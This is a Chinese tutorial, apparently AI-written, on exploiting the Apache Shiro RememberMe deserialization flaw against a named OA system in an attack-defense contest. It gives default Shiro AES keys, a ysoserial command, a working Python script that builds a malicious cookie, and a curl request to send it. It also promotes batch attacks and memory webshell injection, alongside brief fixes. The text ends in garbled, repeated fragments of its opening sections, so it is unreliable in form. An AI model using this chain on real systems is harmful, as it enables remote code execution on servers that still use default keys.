Shiro反序列化漏洞实战教学文档<\/h1>

1. 漏洞背景<\/h2>
根据提供的链接信息，目标系统（新翔OA管理系统）存在Shiro框架的固定密钥漏洞，导致可以实施反序列化攻击。这是一个典型的Java反序列化安全问题，在AWD(Attack With Defense)竞赛环境中经常出现。<\/p>

2. 漏洞原理<\/h2>

2.1 Shiro框架安全机制<\/h3>
Shiro是一个Java安全框架，提供认证、授权、加密和会话管理功能。它使用RememberMe功能来保持用户登录状态。<\/p>

2.2 漏洞成因<\/h3>

固定密钥问题<\/strong>：Shiro使用AES加密RememberMe cookie，但许多系统使用默认或公开的加密密钥<\/li>

反序列化漏洞<\/strong>：加密后的数据会被反序列化，如果攻击者能够伪造有效的RememberMe cookie并控制反序列化过程，就能执行任意代码<\/li> <\/ul>
3. 漏洞检测<\/h2>
3.1 识别Shiro框架<\/h3>

检查HTTP响应头中是否有rememberMe=deleteMe<\/code>字段<\/li>
检查Cookie中是否有rememberMe<\/code>字段<\/li> <\/ol> 3.2 检测固定密钥<\/h3> 使用已知的Shiro默认密钥列表进行测试：<\/p> kPH+bIxk5D2deZiIxcaaaA== 4AvVhmFLUs0KTA3Kprsdag== Z3VucwAAAAAAAAAAAAAAAA== <\/code><\/pre> 4. 漏洞利用<\/h2> 4.1 工具准备<\/h3> ysoserial：Java反序列化利用工具<\/li> Python脚本：生成恶意RememberMe cookie<\/li> Burp Suite：拦截和修改HTTP请求<\/li> <\/ul> 4.2 利用步骤<\/h3> 生成恶意序列化对象<\/strong><\/li> <\/ol> java -jar ysoserial.jar CommonsBeanutils1 "command"<\/span> > payload.ser <\/span><\/span><\/code><\/pre> 使用已知密钥加密payload<\/strong><\/li> <\/ol> from<\/span> Crypto.Cipher import<\/span> AES <\/span><\/span>import<\/span> base64 <\/span><\/span>import<\/span> sys <\/span><\/span> <\/span><\/span>def<\/span> encrypt<\/span>(key, payload): <\/span><\/span> cipher =<\/span> AES.<\/span>new(base64.<\/span>b64decode(key), AES.<\/span>MODE_CBC, IV=<\/span>b<\/span>'<\/span>\x00<\/span>'<\/span>*<\/span>16<\/span>) <\/span><\/span> padded =<\/span> payload +<\/span> bytes([16<\/span> -<\/span> len(payload) %<\/span> 16<\/span>] *<\/span> (16<\/span> -<\/span> len(payload) %<\/span> 16<\/span>)) <\/span><\/span> encrypted =<\/span> cipher.<\/span>encrypt(padded) <\/span><\/span> return<\/span> base64.<\/span>b64encode(encrypted).<\/span>decode() <\/span><\/span> <\/span><\/span>key =<\/span> "kPH+bIxk5D2deZiIxcaaaA=="<\/span> # 已知密钥<\/span> <\/span><\/span>with<\/span> open("payload.ser"<\/span>, "rb"<\/span>) as<\/span> f: <\/span><\/span> payload =<\/span> f.<\/span>read() <\/span><\/span>print(encrypt(key, payload)) <\/span><\/span><\/code><\/pre> 构造恶意Cookie<\/strong> 将生成的加密数据作为RememberMe cookie发送：<\/li> <\/ol> Cookie: rememberMe=[加密后的payload] <\/code><\/pre> 发送请求<\/strong> 使用Burp Repeater或curl发送带有恶意cookie的请求：<\/li> <\/ol> curl -H "Cookie: rememberMe=[加密后的payload]"<\/span> http:\/\/target.com <\/span><\/span><\/code><\/pre>5. 防御措施<\/h2> 5.1 修复方案<\/h3> 升级Shiro版本<\/strong>：使用最新版Shiro框架<\/li> 更换加密密钥<\/strong>：生成新的随机密钥替换默认密钥<\/li> 禁用反序列化<\/strong>：配置Shiro不使用Java原生序列化<\/li> <\/ol> 5.2 配置示例<\/h3> 在shiro.ini中配置自定义密钥：<\/p> securityManager.rememberMeManager.cipherKey<\/span> =<\/span> ${your.random.base64.encoded.key}<\/span> <\/span><\/span><\/code><\/pre>6. AWD竞赛技巧<\/h2> 快速识别<\/strong>：编写脚本自动检测Shiro框架和测试常见密钥<\/li> 批量利用<\/strong>：准备自动化脚本快速攻击多个目标<\/li> 防御加固<\/strong>：在修复自己系统的同时监控对手攻击行为<\/li> 日志监控<\/strong>：实时监控系统日志发现攻击行为<\/li> <\/ol> 7. 扩展知识<\/h2> 其他利用链<\/strong>：除了CommonsBeanutils1，还可以尝试其他ysoserial利用链<\/li> 内存马注入<\/strong>：通过反序列化注入内存webshell维持权限<\/li> 流量分析<\/strong>：在AWD中分析对手的攻击流量获取有用信息<\/li> <\/ol> 8. 参考资源<\/h2> Shiro官方文档<\/li> ysoserial项目<\/li> Java反序列化漏洞白皮书<\/li> AWD竞赛经验分享<\/li> <\/ol> 通过以上步骤，可以有效地利用Shiro反序列化漏洞获取系统权限，同时在防御方面也能采取相应措施保护自己的系统。在AWD竞赛中，这种漏洞的快速利用和防御往往是胜负的关键。<\/p>

Shiro反序列化漏洞实战教学文档<\/h1>

1. 漏洞背景<\/h2> 根据提供的链接信息，目标系统（新翔OA管理系统）存在Shiro框架的固定密钥漏洞，导致可以实施反序列化攻击。这是一个典型的Java反序列化安全问题，在AWD(Attack With Defense)竞赛环境中经常出现。<\/p>

2. 漏洞原理<\/h2>

2.1 Shiro框架安全机制<\/h3> Shiro是一个Java安全框架，提供认证、授权、加密和会话管理功能。它使用RememberMe功能来保持用户登录状态。<\/p>

3. 漏洞检测<\/h2>

4. 漏洞利用<\/h2>

5. 防御措施<\/h2>

1. 漏洞背景<\/h2>
根据提供的链接信息，目标系统（新翔OA管理系统）存在Shiro框架的固定密钥漏洞，导致可以实施反序列化攻击。这是一个典型的Java反序列化安全问题，在AWD(Attack With Defense)竞赛环境中经常出现。<\/p>

2.1 Shiro框架安全机制<\/h3>
Shiro是一个Java安全框架，提供认证、授权、加密和会话管理功能。它使用RememberMe功能来保持用户登录状态。<\/p>